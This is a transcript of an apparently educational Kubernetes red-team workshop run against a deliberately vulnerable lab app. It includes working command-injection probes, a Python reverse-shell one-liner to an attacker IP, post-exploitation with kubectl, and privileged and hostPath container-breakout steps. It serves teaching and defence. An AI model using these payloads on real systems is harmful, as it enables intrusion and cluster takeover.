Workshop on Attacking a Kubernetes Cluster
Host: Welcome to another part of the Kubernetes Learning series. In part one, we focused on Kubernetes and workloads in general, along with some open-source tools. Today in part two, we will focus on approaches for attacking a Kubernetes cluster from a red teaming perspective. This also helps in understanding how an attacker thinks and the mindset they bring while exploiting a Kubernetes cluster. Divyanshu, welcome back to the show. Looking forward to this exciting part.
Divyanshu: I'll just very quickly explain what this application is. It simply takes GET and POST requests.
It creates a password entry from the email and password you provide, and it returns the password for whatever email you pass in the parameter. There is also a redirect functionality, which is still in beta, and it uses TinyDB. These are the libraries I've used for this application. It is an open-source application; I'll give you the link, which you can paste in the description so everyone can go through it. So I'll just open the source code, although I won't explain every line.
So this is the insecure Python app. It is very easy to deploy, and it is an extremely simple application I just wanted to have for my Kubernetes cluster. If you see, it is just 139 lines of code, and it helps me, and everyone around me, understand how to deploy an application on Kubernetes.
I think we have already gone through these files. So I'll just quickly go to the application part, where I'll use HTTPie for connecting to this application via the CLI, so that I can very quickly walk you through how I'm connecting to these APIs. We could also do it via the UI, but I'll prefer the CLI because we are doing everything on the CLI, so it would be easier for me to explain.
Host: Yeah, makes sense.
Divyanshu: I've deployed this; it is the API testing client which we'll use. I'll just copy-paste these commands and create a file so that I can show everyone. Instead of using the domain, right now I'm using the IP, so I'll just replace this with the IP. So this is my first command, if you'll see, and I'll remove this part: you'll see http GET, so I'm just sending a GET request. That would be my first request. And then I'll try to create the password via my email.
So I'll just replace this part with my own values. And now you can see I'm sending a POST request to the create-password endpoint using a test email, and the password is just 'mypassword'. Obviously, because it's an insecure application, it happily takes an easy password; it doesn't do any validation.
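For reference, the HTTPie calls look roughly like this; the port, endpoint paths, and field names are assumptions based on the description above, not the app's exact API:

```bash
# Fetch the app's index page (plain GET)
http GET http://<APP_IP>:5000/

# Create a password entry (hypothetical endpoint and field names)
http POST http://<APP_IP>:5000/create-password email=test@example.com password=mypassword

# Retrieve the stored password for that email
http GET "http://<APP_IP>:5000/get-password?email=test@example.com"
```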
Host: And this application itself is not recommended for our audience to actually use anywhere, correct?
Divyanshu: Right, I don't want folks using this application for production or any real kind of deployment. The next part is that it fetches the password via the get-password API, and I just have to pass the email which I used to create the password. And then the last part is a kind of SSRF scenario which I've intentionally created to show how it would work: if I were deploying this application in EKS, in those cases I would be able to hit the metadata endpoint and get the credentials. Although in this lab that is not required and we won't be doing it; instead we will go to the next part, where we have an RCE. And let me show you the RCE part here itself.
So, let me show you first. There is this app route, you will see; there is this date endpoint. In the trainings or workshops, the participants try to read the source code and find out which endpoint is vulnerable to RCE or command execution, but here I'm just explaining it directly. You can see there is a date endpoint which takes exec as the parameter, and then it calls subprocess, which causes the command injection; there is no sanitization or any kind of validation. So it will run whatever I pass, correct? Right, I'll just show you. It is basically the date endpoint and the exec parameter.
So we just need two values: I'll have date as the endpoint, and then I'll have ls as the command.
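So the injection probe looks something like this; again the route and parameter names follow the description above, and exactly how the input gets spliced into the shell command depends on the app's code:

```bash
# Does the endpoint run and echo back an injected command?
http GET "http://<APP_IP>:5000/date?exec=ls"

# If the parameter is appended to an existing command, a separator may be needed
http GET "http://<APP_IP>:5000/date?exec=;id"
```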
Host: Okay, so you are running a command remotely on the server.
Divyanshu: Correct. So first I'll try to access the application itself from the CLI. You'll see it is showing me the whole content, the insecure password manager. Now I'll try to create the password for the email, and you can see it is showing success, password added to the manager. Then next I'll try to get the password for the email I used, and it says the email is this, the password is this.
Last, I'll come directly to the RCE part and see whether it is vulnerable to RCE; although in the real world we would have to test and try multiple ways. You can see I'm able to do an ls, and there is a Dockerfile, a Jenkinsfile, so many things. Now I can start reading requirements.txt, maybe the DB JSON file, the Jenkinsfile; we have multiple kinds of data here, right? So we can try to exploit it and see. I'll show you a couple more things. So, how will we get to know if we are inside Kubernetes?
So, we'll do a printenv here. When I run this command, it shows me the output, and the moment the output is on the terminal you can see KUBERNETES_PORT, KUBERNETES_SERVICE_PORT, and the service port variables for the vulnerable app.
Host: So all the environment variables you can find out from here. And if there are any secrets or anything, you can access those as well, right?
Divyanshu: Correct. That is why, if you are injecting secrets as environment variables, they would show up directly here.
Although we have not done that. So it is not there, hopefully.
But it also gives us an idea that this is not a plain Docker application; rather it is a container or a pod running inside a Kubernetes cluster, if you look at the output. It gives multiple things: the service endpoints themselves, what language is used, and so on. You get so many things just by looking at the environment variables.
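The quickest version of that check from the injected shell is just to grep the environment; the values shown below are typical defaults, not necessarily what this lab prints:

```bash
# Variables the kubelet injects into every pod; their presence is a strong
# signal that we are inside a Kubernetes cluster rather than a plain Docker host.
env | grep -i kubernetes
# Typical output (values vary per cluster):
#   KUBERNETES_SERVICE_HOST=10.96.0.1
#   KUBERNETES_SERVICE_PORT=443
#   KUBERNETES_PORT=tcp://10.96.0.1:443
```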
So this is the easiest way of fingerprinting, once I have an RCE, whether my application is running on the host itself, in a plain container, or inside a Kubernetes cluster. Based on that, we can decide which attack path we want to take. Right, that is the basic setup and the RCE. Now I'll try to exploit this application. I'll just reinstall python3-pip, just because I don't want to hit an error again; that is why I reinstall it if it is not there.
And I think pip was not there, because I will be using one more tool, which is called pwncat. It is very similar to netcat for the reverse shell, but a little more advanced and easier to use. With netcat, due to the different binaries and versions, it is sometimes difficult, and people following along will have different versions of netcat, so there can be confusion among students that "my netcat is not working, but I do have netcat". That's why I'm using a different tool; you can just find it on GitHub and read the docs.
You can see how it works and everything. So it is installed. Now, as an attacker, I'll open my reverse shell; actually, I'll start my listener before I trigger the reverse shell.
So I'm listening on 0.0.0.0 and the port is 8182, and it says it is bound to this specific IP and port. Let me close this. And then this side is the victim. So let's suppose we have found an RCE; actually, we have found an RCE. So I'll just use the Python payload; I'll copy-paste that Python payload and wrap the line. Sure.
You'll see here, I'm just specifying the port on which I want the reverse shell, and then this is the command for getting the reverse shell: I'm sending /bin/bash to that IP. You will see I'm pulling the IP from ifconfig here; in the real world I would have to put the attacker's IP, or rather the attacker would put their own IP. Right now we are on the same machine, so that is why I'm taking it from ifconfig.
So this command will basically print everything for me on the terminal, which I can easily copy-paste; that is why I have created it this way. You'll see it is now encoding everything, so it becomes very easy for me to just paste the command here and send it, without any hassle. And I already have my reverse shell listener running. Sorry, I think I copied the whole line; just let me get this one.
Yeah, sure. So now, when I go back to the listener, you can see we have received a connection, and it is obviously from the same IP I'm running on; but in a real scenario this would be the victim's IP, from where the reverse shell would come. Now I'll hit Ctrl+D and I'll get a regular shell. You can see I'm now inside the vulnerable-app deployment pod. So this is not our regular terminal; it is the container, the pod, where I've got access.
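Putting the two sides together, the flow is roughly the following. The listener syntax assumes the pwncat-cs flavour of pwncat, and the payload is a classic Python reverse-shell one-liner of the kind described above; the IP and port are placeholders for this lab:

```bash
# Attacker terminal: start the listener
pwncat-cs -lp 8182

# Victim side: payload sent through the vulnerable exec parameter (URL-encoded first).
# <ATTACKER_IP> is taken from ifconfig in the lab, since both ends are the same machine.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER_IP>",8182));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
```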
Host: So this is very much like doing a shell into one of the containers, but from a remote location altogether, right, without having any kubectl permissions or anything like that.
Divyanshu: Correct. So now we'll see from here: the first thing you can notice is that this container is running as root, because of which we have more privileges. Now I can install anything; I can do apt update. Without root privileges I wouldn't be able to do that, right? You can see I was able to run apt update, so now I can install anything. And as you have seen till now, we were using kubectl.
So definitely I would like to install kubectl. Before that, as mentioned here, I'll just run printenv and env; both are almost the same command, and they give me the environment variables. Next, I could try to install nmap, but because of the time constraint I'm not doing that. curl I will install, because I want to download the kubectl binary. As we know, we use kubectl to connect to the Kubernetes cluster, and there was a service account mounted. So I'll just use curl to download the kubectl binary and install it into the PATH, so that I can connect to the Kubernetes cluster via kubectl. I'm closing this and using the install command to install it.
That does everything for me. Now, if I run kubectl auth can-i --list, this command tells me what I am allowed to do. You can see, because I had star-star on everything, it's showing that I have all the permissions: these are the API groups, and I can do whatever I want. I have full control over the cluster, because I was able to install kubectl, and on top of that there was an RBAC binding with full permissions. Because of that, I can now go and create resources in the cluster, delete them, do whatever I want, right?
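The in-pod steps are roughly these; the download commands are the standard ones from the Kubernetes documentation, and the apt step only works because the container runs as root:

```bash
# Inside the compromised pod
apt update && apt install -y curl

# Download the kubectl binary and install it into the PATH
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
install -m 0755 kubectl /usr/local/bin/kubectl

# kubectl picks up the mounted service-account token automatically;
# this lists everything that service account is allowed to do
kubectl auth can-i --list
```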
Host: So it's very much like being an admin in any cloud environment, right?
Divyanshu: Correct. So here you'll see I could also run an nmap scan, which I'm not doing, but I'll show you one last command which gives us a good idea. If you look at cluster-info, I'm now able to dump the cluster info; I'm able to get the nodes, pods, services, everything. So now I have complete access, I can do whatever I want. This is a complete Kubernetes cluster compromise scenario. Because I have full permission, I could go and create another pod, or delete everything, right?
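The recon behind that is just the usual commands:

```bash
kubectl cluster-info dump > cluster-dump.json   # dump the full cluster state
kubectl get nodes -o wide
kubectl get pods,svc --all-namespaces
```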
Host: No, I was just saying that we looked at two things, right? One is the remote code execution vulnerability, and from that we could go all the way to a reverse shell. And now you have complete control of the cluster.
Divyanshu: Correct. Plus, if you look at the YAML, there was no restriction on the deployment of the container itself, so this pod was deployed as root; it was running as root. So when the attacker got access, they were able to run commands as root.
This is actually a real-world scenario which I tested in one of my pen-testing engagements, where I ran a Nuclei scan on the domain and from there I was able to get inside a container. Because the container itself was running as root, I just did an exec into another container, and it was a cloud environment where that container had full permissions; the admin policy was attached. So it led to an AWS compromise in that case. Just because I had an RCE in the application, there was full RBAC, and the container was running as root, I was able to take over the entire AWS account.
So that is how bad these misconfigurations are. I think this is pretty much it for the RBAC part and exploiting a vulnerable application; we have done that, and in the next part we will see the container breakout scenarios. I'm not going to use the same container; I'll show a different container where we just focus on the breakout scenario. Once we have exploited the container, if I want to go to the host, to get complete access to the machine or the server on which this container or pod is running, then I need to find a way to break out of the container and get onto that host. Yeah, correct.
So this is the next scenario. These are some common breakout scenarios. If I read them out: hostPID, sharing the host's process IDs; hostNetwork, sharing the host network; and hostIPC: true. IPC is the inter-process communication namespace, and with hostIPC that namespace is shared between multiple pods. So suppose my pod X has hostIPC: true and there is a malicious pod also running with hostIPC: true.
They would share inter-process communication, and if any secret is placed by pod X in that shared space, the malicious pod can also go and read it. That is why this is bad. Plus the volume mount, which we will see, where I mount the host volume; then a couple of privileged: true cases where I give excessive privileges to my containers; then Docker-in-Docker, which is basically how our kind cluster is running right now. But in scenarios where we don't have kind, in real applications, if I have access to the Docker socket mounted inside the pod, or I can directly run Docker commands inside the pod, then I can create another container, or directly delete all the containers, and do much more, because I am talking to the Docker socket, which effectively has far more permissions. Correct? Right.
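As a condensed illustration of the settings just listed (not the exact lab manifests, which come from the repo credited a bit later), a single pod spec combining them might look like this; any one of these fields on its own already weakens isolation:

```bash
# Only ever apply something like this in a disposable lab cluster
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: risky-pod                      # illustrative name
spec:
  hostPID: true                        # share the node's process namespace
  hostNetwork: true                    # share the node's network namespace
  hostIPC: true                        # share the node's IPC namespace
  containers:
  - name: shell
    image: alpine
    command: ["sh", "-c", "while true; do sleep 30; done"]
    securityContext:
      privileged: true                 # full access to host devices and kernel settings
    volumeMounts:
    - name: docker-sock
      mountPath: /var/run/docker.sock  # lets the pod drive the node's Docker daemon
  volumes:
  - name: docker-sock
    hostPath:
      path: /var/run/docker.sock
EOF
```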
Host: So here you have listed ten to eleven container breakout scenarios. Is this a finite list, or are there more such scenarios which can be used by attackers?
Divyanshu: No, there are more scenarios, and attackers keep finding zero-days as well. If I find a zero-day which gives me a container breakout directly, say I find some process which runs in the container and the same process is also used on the host, and through brute forcing, a race condition, or some other way I manage to reach the host, that would lead to a container breakout. There are also more advanced exploits where you have to write the shellcode in C and then try to exploit it.
Because these are extremely simple to demonstrate and extremely common in current infrastructure, that is why I've covered these scenarios.
Host: Okay, makes sense. So out of these, which ones do you want to show today as breakouts?
Divyanshu: I'll show the host volume mount, the hostPath one, and the unauthenticated Kubernetes dashboard. For the dashboard, I've already deployed it, so I don't have to redeploy. And I have a YAML for the host volume mount, so I'll show that as well. Host volume mount and privileged: true are very similar; I'll explain the difference when I start the lab itself.
And I would like to give credit: I have taken these breakout scenarios from their GitHub. I have not written these YAMLs myself; I'm just using them for our scenario.
Host: Okay. When we publish the video, we'll make sure to tag them as well so that they get the due credit.
Divyanshu: Cool. So this is the host volume mount. A host volume mount container breakout refers to the vulnerability where the host filesystem is mounted into the pod or the container.
An attacker is then able to gain unauthorized access to the host filesystem.
Host: So you sort of have access to the entire file system on the host, not just what the container has access to by default.

Divyanshu: Correct, this is true. So I'm just going into the directory where I have this hostpath pod YAML, and I'll quickly explain it as well.
Okay, just let me reconfirm the path: four, five, and then host-volume. Yeah. So this is the deployment; it is a Pod, I just don't want to bring that up again. The image is Alpine, and you can see I'm mounting onto this /host path: I'm mounting the root directory of the host to /host.
Because I'm mounting the root, whatever is on the host is under that root; everything lives inside the slash itself. So from the container, from the pod, I would be able to access everything. We'll just quickly see the scenario. I've explained the YAML, so I'll just apply it; we can either do a create or an apply here.
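A minimal reconstruction of that manifest (pod and volume names are assumptions; the original YAML comes from the repo credited earlier):

```bash
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-pod        # name is an assumption
spec:
  containers:
  - name: shell
    image: alpine
    command: ["sh", "-c", "while true; do sleep 30; done"]
    volumeMounts:
    - name: hostroot
      mountPath: /host      # the node's / appears here inside the container
  volumes:
  - name: hostroot
    hostPath:
      path: /               # mount the node's entire root filesystem
EOF
```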
Both work; apply is usually used once we have already created or configured something and want to reapply it, but I'm using it here anyway. You can see the hostpath pod is created, and for the post-exploitation I'll cd into that mounted host path and do an ls from the container, from the pod we are running right now. I'll do it very quickly. You can see it is showing me all these files; this is the filesystem of the host itself. Now I'll create a file inside that host filesystem. Right now, that host won't be my EC2 instance, it will be the Docker container on which this node is running, because we are running kind, right? The kind node runs on top of another container.
So it is basically accessing that container, not the EC2 host. Just so that people are not confused about why it won't be visible from the EC2: unlike a real scenario, here it won't show up on the main server's operating system where our pod is ultimately running, because the "host" is the kind node container. Right. So I just created this file, and now I'll access this file again from the host side. I'll explain this command as well: here you can see I'm listing the pod and the node on which my pod is running.
Then I'm doing a docker ps, and from there I'm getting the node name; and you can see I'm doing a docker exec and trying to cat the file which we created via kubectl. Basically, the pod was running and we were able to create a file there; now I'm trying to access the same file via Docker, because kind runs on Docker. You can see I was able to access this file via Docker itself. So it was possible to break out of that container and access the host filesystem, which in our case is the kind node container's filesystem.
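In command form, the verification is roughly this; the pod and node names are placeholders, and in kind the "host" being written to is itself a Docker container:

```bash
# Inside the pod: drop a marker file onto the mounted host filesystem
kubectl exec hostpath-pod -- sh -c 'echo breakout > /host/tmp/breakout-proof'

# On the machine running kind: find the node container and read the same file back
docker ps --format '{{.Names}}'
docker exec <kind-node-name> cat /tmp/breakout-proof
```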
Host: So again, you could access the root directory, you could create a file in the root directory, and later on you could read from it as well.
Divyanshu: Correct. This is the same thing that is written in the steps, I'm just reading it out: get the node name for the hostpath pod, get the container ID, and then execute the cat hostfile command inside the container. It is the same thing we just discussed. So this was the easiest container breakout: just because a team or someone used hostPath and mounted everything, it was possible for me as an attacker to get access to the filesystem. And because I have access to the entire filesystem, I can make any changes.
Right? I'll just go and quickly delete this lab, and we'll move to the next section, where I have privileged: true. Privileged: true, at the pod level, bypasses the security boundaries and gives extra permissions, like access to kernel-level settings, to the pod which is running. So I'll again show you the YAML before we apply it.
Host: So it's more like a container with elevated privileges, right?
Divyanshu: Correct. So I'll just explain the lines. Here in the security context we have set privileged: true; that means I'm saying my pod runs with extra privileges, extra capabilities. The rest is the same: it is just a pod with a simple image, and I'm running the command in a loop so that my pod doesn't die immediately.
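A minimal sketch of that privileged pod; the name and image are assumptions:

```bash
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: priv-pod            # name is an assumption
spec:
  containers:
  - name: shell
    image: ubuntu
    command: ["/bin/sh", "-c", "while true; do sleep 30; done"]  # keep the pod alive
    securityContext:
      privileged: true      # the one line everything below depends on
EOF
```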
Yeah. So I'll just apply this malicious YAML, and the pod is created. Now I'll run a couple of commands, and I'll explain them here itself. First I'll run lsblk to see which block devices are present; this is a classic Linux command, and you can see the device name, xvda1. Okay. And then I'll create the host directory.
Basically, if you see here, this is exactly the same thing which we did in our host volume scenario; there I was writing in the YAML itself that I have a /host and I'm mounting the root into it. Because I have elevated privileges right now with privileged: true, I'll create a directory here, and then I'll do the same thing again: if you see the next command, I'm mounting xvda1 onto that /host, and you'll see there was no error. This was possible because I had elevated privileges, right? Then I'll run a chroot; chroot just changes the root, into this /host itself. And now you will see I am inside some root. We still don't know what it is from here, but in reality this is our node, where our container is running.
We were successfully able to break out here, and now if I do an ls, I'll show you. You will see, because right now my EC2 instance's disk is shared with the node, and my node shares the same kernel with the container or the pod, in this scenario I was even able to see my EC2 data; this is the course material we are working in right now. That was possible because I had access via the privileged flag on the container. Yeah, correct. So this is how the privileged breakout scenario works.
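The breakout sequence from inside that pod, roughly as described; the device name is whatever lsblk shows on your node (xvda1 is common on EC2, elsewhere it may be sda1 or nvme0n1p1):

```bash
kubectl exec -it priv-pod -- bash

# Inside the privileged pod:
lsblk                       # list the node's block devices (visible thanks to privileged: true)
mkdir /host                 # create a mount point
mount /dev/xvda1 /host      # mount the node's root partition (device name varies)
chroot /host /bin/bash      # change root into the node's filesystem
ls /                        # now listing the host's files, not the container's
```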
These are very easy scenarios to learn and understand, and Bishop Fox has given a couple more here. If anyone is interested, they can go and read all these scenarios; they have a big list, around seven or eight scenarios in total, which helps anyone understand how the basic breakout scenarios work. Then there are some CVEs which came out in the last few years. If anyone is interested, they can read about those as well, check in the real world whether these vulnerabilities are present, and try to use these issues during a pen test.
Now, coming to the last attack which we will see in this demo: I'll go directly to the endpoint. You will see this is the Kubernetes dashboard. Whenever applications are deployed in Kubernetes, the DevOps or SRE folks often also deploy the Kubernetes dashboard. When there is a misconfiguration where we allow skipping or anonymous login into the Kubernetes dashboard, we get this Skip button. If I zoom out, you can see there is this Skip button. If the vulnerability is not there, you might still see a Kubernetes dashboard exposed, but there won't be this Skip button. Because the Skip button is present, I can simply click on Skip, it will skip the login for me, and it will show me everything.
So now I can see all the workloads running; you can see the pods that are running, the types of workloads, services, config maps, the cluster resources. So from here also I have access to everything, even though there was that authentication page; you could bypass it, right?
Host: In a way, yes, because you did not have to provide any authentication; you could just skip.
Divyanshu: Okay. So in the real YAML, which is provided by Kubernetes on GitHub, this Skip button, this misconfiguration, is not there. Because I was demonstrating it in the lab, I explicitly created this setup. So this button would only appear if the Kubernetes dashboard is running a very old version, or someone has explicitly created this misconfiguration, or they have some specific, and frankly bad, use case I don't know about.
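For reference, the Skip button is controlled by a startup argument on the dashboard container; a quick way to check for it, assuming the standard install namespace and deployment name, is:

```bash
# The dashboard only shows "Skip" on the login page when it is started with
# --enable-skip-login, which the upstream recommended YAML does not set.
kubectl -n kubernetes-dashboard get deployment kubernetes-dashboard \
  -o jsonpath='{.spec.template.spec.containers[0].args}'
# A misconfigured deployment would list something like:
#   ["--enable-skip-login", ...]
```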
Host: Which makes sense. I was about to ask why somebody would have the Skip button at all if you want to enforce authentication, but okay, now it is clear.

Divyanshu: Maybe we can also try Shodan and, based on fingerprinting, see whether something like this shows up in a real environment; I don't want to show that in the workshop, because I don't want to exploit anything live. Anyway, that is correct: we have completed the attack part, and it brings us to the end of how we attack Kubernetes infrastructure. These are some basic attacks and post-exploitation techniques which we have talked about. So over to you, Purusham, if you have any questions, because this was a lot to see for the first time, going through all of it at once.
Host: Yeah, so I have many questions, some around the attack itself and mostly around the defense side. You showed a few things, right? The remote code execution, and the RBAC policies where you have star-star permissions.
Is there any scenario where these are legitimate?
Because we can understand that, ideally, it is not best practice to have host access or star-star permissions. But is there any scenario where you see that being justified from a business perspective?
Divyanshu: From a business perspective, I don't think this should ever be required. Maybe in testing, or when application developers are just getting started, they can have this in their test environment, although they should not expose it publicly. Only if they want to test or understand how these things work should they have this. A real-world setup shouldn't be misconfigured like this: every application needs only specific access, maybe to a specific pod or namespace, and it should be very specific. I don't think any pod should be able to go and create other pods, right? So those permissions are not required.
Host: Correct. Okay, the other question that I have is: you mentioned three ways to expose or create a service, right? NodePort, ClusterIP, LoadBalancer.
Let's say I'm creating a cluster and deploying it in AWS. In which scenarios would you suggest I use ClusterIP, and in which scenarios would you suggest LoadBalancer?
Divyanshu: Whenever we have an application that I want to be accessed directly from the external environment, from the internet, in those cases we can use LoadBalancer. If I put LoadBalancer in this YAML right now, where we had this sample app, you'll see the type is NodePort; if I changed it to LoadBalancer, it wouldn't come up, because on bare metal, or on a plain EC2 like ours, we don't have a load balancer, right? It is specific to a managed cloud environment, correct? There it would create a cloud load balancer for you.
It would directly map your container to that load balancer, so your application becomes accessible directly; you don't have to do any explicit mapping. In the case of NodePort, it exposes a port on the node's IP: if you are not in a private subnet and the node has a public IP, then the application is accessible outside the cluster on that public IP. If it is within a private subnet, obviously you won't be able to access it; but if your networking configuration allows public access and the service is a NodePort, then my pod is reachable from outside the cluster itself.
And when we talk about ClusterIP, it stays within the cluster. Say I have pod one and pod two running within the cluster and I want some kind of communication between them, like a microservice which only needs to talk internally; in that case I will have ClusterIP, where the communication happens within the cluster. So that is the main difference between these.
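As a rough illustration, the only thing that changes between the three is the type field; the names and ports below are placeholders:

```bash
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: sample-app
spec:
  type: ClusterIP           # internal-only: reachable from other pods in the cluster
  # type: NodePort          # also opens a high port (30000-32767) on every node's IP
  # type: LoadBalancer      # on a managed cloud (e.g. EKS) also provisions a cloud load balancer
  selector:
    app: sample-app
  ports:
  - port: 80
    targetPort: 5000
EOF
```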
Host: Okay, one follow-up question on the load balancer. Let's say I have a user-facing app and I create a LoadBalancer service. It has to use some of the networking components of AWS, right, so that I can access it from the outside world. Which components are used, and do I need to do any special configuration for that?
Divyanshu: No special configuration; it would be very similar to any application you run. Your NACLs, your private subnets, your VPC and security groups, all these things need to be in place, right? It is how a generic application works. If I block all network access, I'll give an analogy again: if my main door is locked and everything inside my house is open, still nobody can come inside, because the main door itself is locked. It is very similar here: if I haven't allowed the networking access, the ingress and egress, the incoming and outgoing traffic, then the traffic flow won't happen. My application may allow it, but my network does not.
Host: Okay, that makes sense.
I think I have more questions from a defense perspective. One last question that I have is: whatever setup we saw, would the same apply to a Windows-based OS? If your host OS is Windows, will everything work? Let's say I create the service, the application, all the YAMLs that you showed; will they work as-is, or do we need to make any changes in that scenario?
Divyanshu: So I haven't used Windows much, and I haven't really seen anyone using Windows on the server side. But as far as Kubernetes goes, it should run in a similar way; because I haven't seen these setups on Windows in reality, I don't know the exact answer. For .NET and those kinds of applications, maybe some specific changes would be required at the host level, but at the network level everything would be the same. Right.
So maybe something would change on the configuration side, but I'm not sure about that; I would need to check. Okay.
Host: No, that's fair, that's understandable. And I have seen something very similar: most Kubernetes practitioners use Linux-based or Ubuntu-based host OSs, so that should cover the majority of the landscape. Okay. I think all of my questions around the attack side have been answered; once we go into the defense side, I'll have more questions.
Divyanshu: Got it. Sure.
Host: Thank you, everyone, for joining us in part two of this workshop. This is part two of a multipart series focusing on Kubernetes learning, attack, and defense. We hope you found part two informative and engaging. Stay tuned for part three, where we'll dive deeper into practical strategies for defending a Kubernetes cluster and some of the best practices to follow when defending Kubernetes clusters from attackers. See you soon. Thank you.